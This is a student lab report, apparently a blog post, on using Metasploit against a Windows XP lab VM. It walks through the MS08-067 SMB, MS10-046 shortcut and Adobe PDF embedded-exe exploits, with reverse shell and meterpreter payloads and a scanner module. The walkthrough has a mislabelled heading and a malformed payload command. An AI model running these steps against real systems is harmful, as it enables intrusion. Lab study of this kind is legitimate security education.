MS08_067漏洞渗透攻击(主动攻击)
这个实验使用winXPenSP3为靶机,并且只能用它当靶机。。。。并且确保两台虚拟机在同一网段。
1.打开终端,输入msfconsole
2.输入命令use exploit/windows/smb/ms08_067_netapi
,使用MS08_067
漏洞模块;
3.使用命令set payload generic/shell_reverse_tcp
指定攻击有效载荷;
4.设置具体参数:
set RHOST Windows的IP;```
5.输入```show options```查看所有参数是否设置正确
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113408781-52248154.png)
6.最后发起攻击输入```exploit```
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180424113446155-285754411.png)
###MS11050安全漏洞(IE浏览器渗透攻击)
使用```免考xp sp3```为靶机;
首先得确保两台机子在同一网段内,如果不在就手动修改;
和上一步一样,首先终端中打开```msfconsole```
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160230349-537278511.png)
利用指令```search ms10_046```找到可以攻击的模块
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160441668-1345545541.png)
输入命令```use exploit/windows/browser/ms10_046_shortcut_icon_dllloader```
使用 ```set payload windows/meterpreter/reverse_tcp ```设置payload,并使用```show options```查看参数:
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162235538-2117473671.png)
最后下令发起攻击```exploit```
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425160742544-1112484225.png)
复制```local IP```,在靶机上使用IE浏览器进行访问:
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162457707-711307356.png)
此时返回kali
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162613473-2036380092.png)
使用 sessions -i 1 选择会话1,成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425162720880-656205196.png)
###对Adobe的漏洞攻击
输入```search adobe```查询和```adobe```漏洞有关的模块
将```exploit/windows/fileformat/adobe_pdf_embedded_exe```作为选择,然后```show payloads```查看```payload```:
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425163208741-277551273.png)
输入命令``` use exploit/windows/fileformat/adobe_pdf_embedded_exe```
选择``` windows/meterpreter/reverse_tcp``` 作为攻击载荷并输入命令 ```set windows/meterpreter/reverse_tcp```
接着继续查看参数
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164747784-389552693.png)
输入``` set LHOST Kali的IP ```,接着```exploit```进行攻击
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180425164949659-1414727268.png)
会生成一个pdf文件,我们需要找到它并将文件拷贝至windows XP下。
这个pdf文件是在隐藏文件夹中,所以我们需要在文件夹选项中选中查看隐藏文件。
![](https://images2018.cnblogs.com/blog/889835/201804/889835-20180427135822953-1502406986.png)
输入命令进行监听回连
![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105742916-309070190.png)
###辅助模块的应用
输入命令```show auxiliary```查看辅助模块
在这里我使用```scanner/http/options```
接着输入命令```use scanner/http/options```之后输入```info```查看信息
![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105232332-1293886875.png)
设置完参数后执行
![](https://images2018.cnblogs.com/blog/889835/201805/889835-20180502105322218-1226577013.png)
###基础问题回答
用自己的话解释什么是exploit,payload,encode:
exploit:攻击手段,是能使攻击武器(payload)的方法;
payload:攻击武器,真正具有攻击性的代码;
encode:编码方式,根据payload将要被放置的环境选择合适的编码方式,使它能够正常的运行,如:消除所有的“0x00”;
###实验体会
这个实验让我知道了平时杀毒软件提示有高危漏洞,这些漏洞是如何被别人利用从而达到攻击你电脑的目的的,但是只能通过特定的漏洞攻击特定的电脑,不知道什么时候我们也能熟练利用各种漏洞攻击各种电脑。还有就是,做这个实验还是需要一个好的实验环境的。。。我的kali做到一半时突然不能联网了。。。重启大法也没有用,最后又莫名能连上了。。。